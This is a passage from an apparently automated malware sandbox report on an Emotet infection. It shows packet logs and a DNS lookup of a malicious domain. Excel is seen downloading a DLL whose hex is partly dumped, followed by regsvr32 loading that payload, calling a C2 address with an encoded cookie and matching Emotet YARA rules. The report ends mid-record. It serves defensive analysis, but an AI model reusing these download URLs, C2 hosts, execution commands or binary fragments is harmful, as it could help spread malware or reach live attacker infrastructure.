                                                                                                              Mar 2, 2022 16:42:20.553549051 CET4916580192.168.2.22212.64.200.154
                                                                                                              Mar 2, 2022 16:42:20.553584099 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:20.553589106 CET4916580192.168.2.22212.64.200.154
                                                                                                              Mar 2, 2022 16:42:20.553625107 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:20.553632021 CET4916580192.168.2.22212.64.200.154
                                                                                                              Mar 2, 2022 16:42:20.553664923 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:20.553678036 CET4916580192.168.2.22212.64.200.154
                                                                                                              Mar 2, 2022 16:42:20.553703070 CET4916580192.168.2.22212.64.200.154
                                                                                                              Mar 2, 2022 16:42:20.553704977 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:20.553714991 CET4916580192.168.2.22212.64.200.154
                                                                                                              Mar 2, 2022 16:42:20.553745031 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:20.553752899 CET4916580192.168.2.22212.64.200.154
                                                                                                              Mar 2, 2022 16:42:20.553783894 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:20.553793907 CET4916580192.168.2.22212.64.200.154
                                                                                                              Mar 2, 2022 16:42:20.553827047 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:20.553829908 CET4916580192.168.2.22212.64.200.154
                                                                                                              Mar 2, 2022 16:42:20.553900957 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:20.553940058 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:20.553981066 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:20.553982973 CET4916580192.168.2.22212.64.200.154
                                                                                                              Mar 2, 2022 16:42:20.553993940 CET4916580192.168.2.22212.64.200.154
                                                                                                              Mar 2, 2022 16:42:20.553999901 CET4916580192.168.2.22212.64.200.154
                                                                                                              Mar 2, 2022 16:42:20.554022074 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:20.554075956 CET4916580192.168.2.22212.64.200.154
                                                                                                              Mar 2, 2022 16:42:20.554079056 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:20.554091930 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:20.554124117 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:20.554126978 CET4916580192.168.2.22212.64.200.154
                                                                                                              Mar 2, 2022 16:42:20.554224014 CET4916580192.168.2.22212.64.200.154
                                                                                                              Mar 2, 2022 16:42:20.554238081 CET4916580192.168.2.22212.64.200.154
                                                                                                              Mar 2, 2022 16:42:20.554506063 CET4916580192.168.2.22212.64.200.154
                                                                                                              Mar 2, 2022 16:42:20.570205927 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:20.570269108 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:20.570311069 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:20.570349932 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:20.570388079 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:20.570389032 CET4916580192.168.2.22212.64.200.154
                                                                                                              Mar 2, 2022 16:42:20.570419073 CET4916580192.168.2.22212.64.200.154
                                                                                                              Mar 2, 2022 16:42:20.570421934 CET4916580192.168.2.22212.64.200.154
                                                                                                              Mar 2, 2022 16:42:20.570429087 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:20.570430040 CET4916580192.168.2.22212.64.200.154
                                                                                                              Mar 2, 2022 16:42:20.570475101 CET4916580192.168.2.22212.64.200.154
                                                                                                              Mar 2, 2022 16:42:20.570564985 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:20.570606947 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:20.570620060 CET4916580192.168.2.22212.64.200.154
                                                                                                              Mar 2, 2022 16:42:20.570648909 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:20.570661068 CET4916580192.168.2.22212.64.200.154
                                                                                                              Mar 2, 2022 16:42:20.570702076 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:20.570743084 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:20.570755959 CET4916580192.168.2.22212.64.200.154
                                                                                                              Mar 2, 2022 16:42:20.570785046 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:20.570789099 CET4916580192.168.2.22212.64.200.154
                                                                                                              Mar 2, 2022 16:42:20.570825100 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:20.570864916 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:20.570878983 CET4916580192.168.2.22212.64.200.154
                                                                                                              Mar 2, 2022 16:42:20.570904970 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:20.570911884 CET4916580192.168.2.22212.64.200.154
                                                                                                              Mar 2, 2022 16:42:20.570943117 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:20.570983887 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:20.570991039 CET4916580192.168.2.22212.64.200.154
                                                                                                              Mar 2, 2022 16:42:20.571023941 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:20.571063042 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:20.571070910 CET4916580192.168.2.22212.64.200.154
                                                                                                              Mar 2, 2022 16:42:20.571101904 CET4916580192.168.2.22212.64.200.154
                                                                                                              Mar 2, 2022 16:42:20.571104050 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:20.571129084 CET4916580192.168.2.22212.64.200.154
                                                                                                              Mar 2, 2022 16:42:20.571403980 CET4916580192.168.2.22212.64.200.154
                                                                                                              Mar 2, 2022 16:42:20.571420908 CET4916580192.168.2.22212.64.200.154
                                                                                                              Mar 2, 2022 16:42:20.599391937 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:20.599459887 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:20.599498987 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:20.599539042 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:20.599576950 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:20.599618912 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:20.599626064 CET4916580192.168.2.22212.64.200.154
                                                                                                              Mar 2, 2022 16:42:20.599659920 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:20.599663019 CET4916580192.168.2.22212.64.200.154
                                                                                                              Mar 2, 2022 16:42:20.599674940 CET4916580192.168.2.22212.64.200.154
                                                                                                              Mar 2, 2022 16:42:20.599701881 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:20.599720955 CET4916580192.168.2.22212.64.200.154
                                                                                                              Mar 2, 2022 16:42:20.599742889 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:20.599750996 CET4916580192.168.2.22212.64.200.154
                                                                                                              Mar 2, 2022 16:42:20.599786043 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:20.599800110 CET4916580192.168.2.22212.64.200.154
                                                                                                              Mar 2, 2022 16:42:20.599828959 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:20.599841118 CET4916580192.168.2.22212.64.200.154
                                                                                                              Mar 2, 2022 16:42:20.599872112 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:20.599884033 CET4916580192.168.2.22212.64.200.154
                                                                                                              Mar 2, 2022 16:42:20.599911928 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:20.599953890 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:20.599976063 CET4916580192.168.2.22212.64.200.154
                                                                                                              Mar 2, 2022 16:42:20.599996090 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:20.600035906 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:20.600064993 CET4916580192.168.2.22212.64.200.154
                                                                                                              Mar 2, 2022 16:42:20.600075006 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:20.600101948 CET4916580192.168.2.22212.64.200.154
                                                                                                              Mar 2, 2022 16:42:20.600116968 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:20.600138903 CET4916580192.168.2.22212.64.200.154
                                                                                                              Mar 2, 2022 16:42:20.600156069 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:20.600172997 CET4916580192.168.2.22212.64.200.154
                                                                                                              Mar 2, 2022 16:42:20.600195885 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:20.600233078 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:20.600261927 CET4916580192.168.2.22212.64.200.154
                                                                                                              Mar 2, 2022 16:42:20.600296974 CET4916580192.168.2.22212.64.200.154
                                                                                                              Mar 2, 2022 16:42:20.600862980 CET4916580192.168.2.22212.64.200.154
                                                                                                              Mar 2, 2022 16:43:14.784140110 CET49166443192.168.2.22168.119.39.118
                                                                                                              Mar 2, 2022 16:43:14.784195900 CET44349166168.119.39.118192.168.2.22
                                                                                                              Mar 2, 2022 16:43:14.784312010 CET49166443192.168.2.22168.119.39.118
                                                                                                              Mar 2, 2022 16:43:14.859569073 CET49166443192.168.2.22168.119.39.118
                                                                                                              Mar 2, 2022 16:43:14.859591961 CET44349166168.119.39.118192.168.2.22
                                                                                                              Mar 2, 2022 16:43:14.939299107 CET44349166168.119.39.118192.168.2.22
                                                                                                              Mar 2, 2022 16:43:14.939387083 CET49166443192.168.2.22168.119.39.118
                                                                                                              Mar 2, 2022 16:43:14.956257105 CET49166443192.168.2.22168.119.39.118
                                                                                                              Mar 2, 2022 16:43:14.956279993 CET44349166168.119.39.118192.168.2.22
                                                                                                              Mar 2, 2022 16:43:14.956907988 CET44349166168.119.39.118192.168.2.22
                                                                                                              Mar 2, 2022 16:43:14.957000971 CET49166443192.168.2.22168.119.39.118
                                                                                                              Mar 2, 2022 16:43:15.559009075 CET49166443192.168.2.22168.119.39.118
                                                                                                              Mar 2, 2022 16:43:15.601888895 CET44349166168.119.39.118192.168.2.22
                                                                                                              Mar 2, 2022 16:43:16.418098927 CET44349166168.119.39.118192.168.2.22
                                                                                                              Mar 2, 2022 16:43:16.418181896 CET44349166168.119.39.118192.168.2.22
                                                                                                              Mar 2, 2022 16:43:16.418267012 CET49166443192.168.2.22168.119.39.118
                                                                                                              Mar 2, 2022 16:43:16.420193911 CET49166443192.168.2.22168.119.39.118
                                                                                                              Mar 2, 2022 16:43:16.420217991 CET44349166168.119.39.118192.168.2.22
                                                                                                              Mar 2, 2022 16:44:19.649750948 CET4916580192.168.2.22212.64.200.154
                                                                                                              Mar 2, 2022 16:44:19.708684921 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:44:19.712321043 CET4916580192.168.2.22212.64.200.154

                                                                                                              UDP Packets

                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Mar 2, 2022 16:42:19.816369057 CET5216753192.168.2.228.8.8.8
                                                                                                              Mar 2, 2022 16:42:19.832957029 CET53521678.8.8.8192.168.2.22

                                                                                                              DNS Queries

                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                              Mar 2, 2022 16:42:19.816369057 CET192.168.2.228.8.8.80x6808Standard query (0)gymsportive.comA (IP address)IN (0x0001)

                                                                                                              DNS Answers

                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                              Mar 2, 2022 16:42:19.832957029 CET8.8.8.8192.168.2.220x6808No error (0)gymsportive.com212.64.200.154A (IP address)IN (0x0001)

                                                                                                              HTTP Request Dependency Graph

                                                                                                              • 168.119.39.118
                                                                                                              • gymsportive.com

                                                                                                              HTTP Packets

                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              0192.168.2.2249166168.119.39.118443C:\Windows\SysWOW64\regsvr32.exe
                                                                                                              TimestampkBytes transferredDirectionData


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              1192.168.2.2249165212.64.200.15480C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Mar 2, 2022 16:42:19.905479908 CET2OUTGET /0zwe/pSiUh/ HTTP/1.1
                                                                                                              Accept: */*
                                                                                                              UA-CPU: AMD64
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                              Host: gymsportive.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Mar 2, 2022 16:42:19.981950045 CET3INHTTP/1.1 200 OK
                                                                                                              Cache-Control: no-cache, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Content-Type: application/x-msdownload
                                                                                                              Expires: Wed, 02 Mar 2022 15:42:19 GMT
                                                                                                              Last-Modified: Wed, 02 Mar 2022 15:42:19 GMT
                                                                                                              Server:
                                                                                                              Set-Cookie: 621f905be66af=1646235739; expires=Wed, 02-Mar-2022 15:43:19 GMT; Max-Age=60; path=/
                                                                                                              Content-Disposition: attachment; filename="Lg1r0mo1.dll"
                                                                                                              Content-Transfer-Encoding: binary
                                                                                                              X-Powered-By-Plesk: PleskWin
                                                                                                              Date: Wed, 02 Mar 2022 15:43:42 GMT
                                                                                                              Content-Length: 1028096
                                                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 be 93 00 15 fa f2 6e 46 fa f2 6e 46 fa f2 6e 46 39 fd 31 46 f0 f2 6e 46 39 fd 33 46 ed f2 6e 46 fa f2 6f 46 da f0 6e 46 dd 34 13 46 e5 f2 6e 46 dd 34 03 46 76 f2 6e 46 dd 34 00 46 5b f2 6e 46 dd 34 14 46 fb f2 6e 46 dd 34 12 46 fb f2 6e 46 fa f2 6e 46 fb f2 6e 46 dd 34 16 46 fb f2 6e 46 52 69 63 68 fa f2 6e 46 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 1c 7e 1e 62 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 60 09 00 00 80 06 00 00 00 00 00 27 8e 04 00 00 10 00 00 00 70 09 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 f0 0f 00 00 10 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 a0 7b 0b 00 ab 01 00 00 00 00 0c 00 f0 00 00 00 00 50 0c 00 c6 fe 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 0f 00 f4 8b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 77 0a 00 40 00 00 00 00 00 00 00 00 00 00 00 e4 0c 0c 00 f4 0b 00 00 00 40 0c 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 97 50 09 00 00 10 00 00 00 60 09 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 4b 0d 02 00 00 70 09 00 00 10 02 00 00 70 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 c8 7f 00 00 00 80 0b 00 00 40 00 00 00 80 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 b3 3f 00 00 00 00 0c 00 00 40 00 00 00 c0 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 00 00 19 03 00 00 00 40 0c 00 00 10 00 00 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 c6 fe 02 00 00 50 0c 00 00 00 03 00 00 10 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 05 9f 00 00 00 50 0f 00 00 a0 00 00 00 10 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$nFnFnF91FnF93FnFoFnF4FnF4FvnF4F[nF4FnF4FnFnFnF4FnFRichnFPEL~b!`'p{PPw@@@.textP` `.rdataKpp@@.data@@.idata?@@.didat@@.rsrcP@@.relocP@B
                                                                                                              Mar 2, 2022 16:42:19.981976986 CET5INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                              Data Ascii:
                                                                                                              Mar 2, 2022 16:42:19.981997967 CET6INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                              Data Ascii:
                                                                                                              Mar 2, 2022 16:42:19.982016087 CET7INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                              Data Ascii:
                                                                                                              Mar 2, 2022 16:42:19.982032061 CET9INData Raw: 00 e9 fa 81 00 00 e9 22 0a 00 00 e9 80 6a 00 00 e9 48 09 00 00 e9 6d 1e 00 00 e9 96 0c 00 00 e9 a6 14 00 00 e9 a2 57 00 00 e9 08 09 00 00 e9 55 0b 00 00 e9 38 7a 00 00 e9 59 6a 00 00 e9 08 88 00 00 e9 30 82 00 00 e9 01 16 00 00 e9 96 1d 00 00 e9
                                                                                                              Data Ascii: "jHmWU8zYj0nVYY,x44B$LTVy
                                                                                                              Mar 2, 2022 16:42:19.982048035 CET10INData Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                              Data Ascii:
                                                                                                              Mar 2, 2022 16:42:19.982064962 CET12INData Raw: cc cc 6a 01 ff 71 20 ff 15 b0 15 0c 10 c3 cc cc cc 6a 04 b8 20 d7 08 10 e8 c5 58 04 00 8b f1 89 75 f0 c7 06 34 83 09 10 83 65 fc 00 8d 4e 78 c7 01 08 83 09 10 e8 51 b2 00 00 83 4d fc ff 8b ce e8 95 f3 ff ff e8 70 59 04 00 c3 cc cc cc cc cc cc cc
                                                                                                              Data Ascii: jq j Xu4eNxQMpY VPSY>u^ 1RYD$|;BBhWAyfVt$QYuh
                                                                                                              Mar 2, 2022 16:42:19.982083082 CET13INData Raw: 57 ff 74 24 2c 56 ff 74 24 38 ff d5 8b f0 f7 de 1b f6 46 85 f6 74 05 e8 44 ed ff ff 5f 5e 5d 5b 59 c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                              Data Ascii: Wt$,Vt$8FtD_^][YVL$uh@P^PVt$;~x~Va"@;};~;}P^jKS
                                                                                                              Mar 2, 2022 16:42:19.982099056 CET14INData Raw: cc cc cc cc cc cc cc 6a 10 b8 f3 d7 08 10 e8 c4 4e 04 00 8b 7d 08 33 c0 33 f6 3b fe 0f 95 c0 3b c6 75 0a 68 05 40 00 80 e8 f5 eb ff ff ff 15 80 b4 0b 10 89 45 e4 89 75 e8 3b fe 89 75 fc bb 00 04 00 00 74 51 57 ff 15 9c 11 0c 10 40 6a 02 50 89 45
                                                                                                              Data Ascii: jN}33;;uh@Eu;utQW@jPEEP|3u;VCYt%[VMTuVWPAVtV@jPEEP}34};WYtZWMuWVP
                                                                                                              Mar 2, 2022 16:42:19.982126951 CET16INData Raw: 10 e8 1b e5 ff ff 83 c4 0c 5d ff 25 04 80 0b 10 cc cc cc cc cc cc cc cc e9 be e4 ff ff 55 8b ec 83 7d 08 00 56 57 8b f9 75 0a 68 57 00 07 80 e8 b4 e6 ff ff ff 75 0c ff 75 08 e8 21 4f 04 00 59 59 8b f0 56 8b cf e8 90 e4 ff ff ff 75 0c 8d 4e 01 ff
                                                                                                              Data Ascii: ]%U}VWuhWuu!OYYVuNuQPQV_^]L$D$Pt$jHtPvJVPM'e+PPEhPr}WrJ
                                                                                                              Mar 2, 2022 16:42:20.040560007 CET17INData Raw: cc cc cc e8 a7 b0 01 00 0f b7 4c 24 04 8b 40 0c 51 50 ff 15 50 16 0c 10 c2 04 00 cc cc cc cc cc cc ff 74 24 04 6a 00 68 15 04 00 00 ff 71 20 ff 15 ac 15 0c 10 c2 04 00 cc cc cc cc cc 6a 00 ff 74 24 08 68 14 04 00 00 ff 71 20 ff 15 ac 15 0c 10 c2
                                                                                                              Data Ascii: L$@QPPt$jhq jt$hq Vjjd/^D$t$P:@jVCuujfelfxFtN|E9EHE


                                                                                                              HTTPS Proxied Packets

                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              0192.168.2.2249166168.119.39.118443C:\Windows\SysWOW64\regsvr32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2022-03-02 15:43:15 UTC0OUTGET /RTqOvyibSpsqRLeCHAwzwsZUvkaT HTTP/1.1
                                                                                                              Cookie: qNjwxkh=AFLTfK9fIBK6lnbulhI7c8xuJYBHytmEF4RnscbegU5ARco2Ov+wvYmlCWGjR5iRbpiDElFN0mE7/RzA1kBHXra1n+DdZZ/0nWkhpfgcHvYmOKaBSaM2AlKPdCLcHXfASzT21JxpI+itOUwulg0p/YvVS81C8mnpxG+6TaYEIXQNyx0QR8otuNcfuEKU4QpHu9EKg/ECc3gGVpKbTk7/I2FJs30AWb2pLbxGdfiqBgsF51+Oaaj/uTpMmG1137PAZBtRtn3mSRV+k/bNw0I3O4V3sJnZYPMRB6W35SRjpQR4FfjE4A==
                                                                                                              Host: 168.119.39.118
                                                                                                              Connection: Keep-Alive
                                                                                                              Cache-Control: no-cache
                                                                                                              2022-03-02 15:43:16 UTC0INHTTP/1.1 200 OK
                                                                                                              Server: nginx
                                                                                                              Date: Wed, 02 Mar 2022 15:43:16 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              2022-03-02 15:43:16 UTC0INData Raw: 31 62 35 0d 0a bf 0e 3c d6 ff 5b dd ce 75 9a 05 38 05 1b 6e 09 6f ac 42 a5 7d 9a 5a 61 71 bf 78 48 6c 25 a1 5f 81 77 cb 80 cf 95 16 13 6f f2 e1 28 1b 3c 68 8e df 89 fd 1d b9 f4 1d e4 b8 8d c4 dc 90 0f c5 c3 5b e5 0a cf dc 00 0e 3c 71 67 c5 77 e2 b5 ed 94 1c 5d 07 7b 76 f1 2f 87 00 37 bf aa 4c 3a e4 77 a2 dc 9f 00 4f 86 e3 45 a7 e6 47 48 63 43 ca 1c 1b b7 fb 8e 1e 84 46 f9 0b 72 48 46 29 53 4e fb 1c fb 6a 9a e7 20 49 7b cf 17 8b 0c 6e 50 1a e4 64 31 97 5e 1e b9 5f d6 22 7c d7 18 e8 4b ee 10 88 64 dd 63 3e 52 b6 b2 e8 40 36 d1 b1 82 47 7c 39 9e 52 27 6e 8e 31 b9 c8 95 aa e8 54 98 db 6c 7e 3b d7 c9 1e 19 da ed f3 71 f1 0e f6 8b ab c4 1e a2 b2 e8 71 07 4f 0e 1d 6c a0 d8 b1 5d e7 53 d8 ec ab e5 2f 98 94 02 5a 5d a3 5a c0 b3 f2 f8 2f 6e aa 85 0b 5b 99 a5 28 de
                                                                                                              Data Ascii: 1b5<[u8noB}ZaqxHl%_wo(<h[<qgw]{v/7L:wOEGHcCFrHF)SNj I{nPd1^_"|Kdc>R@6G|9R'n1Tl~;qqOl]S/Z]Z/n[(


                                                                                                              Statistics

                                                                                                              CPU Usage

                                                                                                              Click to jump to process

                                                                                                              Memory Usage

                                                                                                              Click to jump to process

                                                                                                              High Level Behavior Distribution

                                                                                                              Click to dive into process behavior distribution

                                                                                                              Behavior

                                                                                                              Click to jump to process

                                                                                                              System Behavior

                                                                                                              General

                                                                                                              Target ID:0
                                                                                                              Start time:16:41:19
                                                                                                              Start date:02/03/2022
                                                                                                              Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                                                                              Imagebase:0x13fb30000
                                                                                                              File size:28253536 bytes
                                                                                                              MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high

                                                                                                              General

                                                                                                              Target ID:3
                                                                                                              Start time:16:41:29
                                                                                                              Start date:02/03/2022
                                                                                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\SysWow64\regsvr32.exe /s ..\sei.ocx
                                                                                                              Imagebase:0xb70000
                                                                                                              File size:14848 bytes
                                                                                                              MD5 hash:432BE6CF7311062633459EEF6B242FB5
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.438925109.0000000000461000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.438768483.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Reputation:high

                                                                                                              General

                                                                                                              Target ID:4
                                                                                                              Start time:16:41:32
                                                                                                              Start date:02/03/2022
                                                                                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Ufazcuvgqkvqusea\tadr.wns"
                                                                                                              Imagebase:0xb70000
                                                                                                              File size:14848 bytes
                                                                                                              MD5 hash:432BE6CF7311062633459EEF6B242FB5
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.449507584.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.449723036.0000000000281000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Reputation:high

                                                                                                              General

                                                                                                              Target ID:5
                                                                                                              Start time:16:41:37
                                                                                                              Start date:02/03/2022
                                                                                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                              Wow64 process (32bit):true
